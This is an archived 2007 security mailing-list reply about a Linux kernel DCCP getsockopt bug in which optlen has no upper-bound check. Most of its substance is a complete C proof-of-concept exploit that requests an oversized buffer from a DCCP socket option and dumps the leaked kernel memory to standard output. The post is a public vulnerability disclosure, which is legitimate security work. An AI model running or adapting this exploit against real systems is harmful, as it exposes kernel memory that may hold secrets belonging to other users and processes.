bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Linux Kernel DCCP Memory Disclosure Vulnerability

from [Robert Święcki] [Permanent Link][Original]
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] Linux Kernel DCCP Memory Disclosure Vulnerability
From: Robert Święcki <jagger@swiecki.net>
Date: Tue, 27 Mar 2007 22:33:14 +0200
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
In-reply-to: <460919D0.8010207@swiecki.net>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
References: <460919D0.8010207@swiecki.net>
User-agent: Thunderbird Mnenhy/0.7.4.0 
> ...
> if (get_user(len, optlen))
>   return -EFAULT;
> if (len < sizeof(int))
>    return -EINVAL;

Actually, `optlen' is not checked againist upper limit as well, so we
can simply use any large positive value for getsockopt()'s optlen and we
will be able  to use it on IA32 cpus as well, without playing with
signedness. I must be blind :).

POC:
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
     void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
     if (mem == (void*)-1) {
        printf("Alloc failed\n");
        return -1;
     }
     /* SOCK_DCCP, IPPROTO_DCCP */
     int s = socket(PF_INET, 6, 33);
     if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
     }
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
     int len = BUFSIZE;
     int x = getsockopt(s, 269, 11, mem, &len);

     if (x == -1)
        perror("SETSOCKOPT");
     else
        printf("SUCCESS\n");

     write(1, mem, BUFSIZE);

     return 0;
}



-- 
Robert Swiecki - http://www.swiecki.net
NEVER EVER mess with a PCB jumper you don't understand, even if it's
labelled "SEX AND FREE BEER"   (C)1992 Dave Haynie - Amiga developer
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [USN-443-1] Firefox vulnerability, Kees Cook
Next by Date:  Re: RE: Xbox 360 Hypervisor Privilege Escalation Vulnerability, 5150sd
Previous by Thread:  Linux Kernel DCCP Memory Disclosure Vulnerability, Robert Święcki
Next by Thread:  [ MDKSA-2007:070 ] - Updated evolution packages to address vulnerability, security
Indexes:  [Date] [Thread] [Top] [All Lists]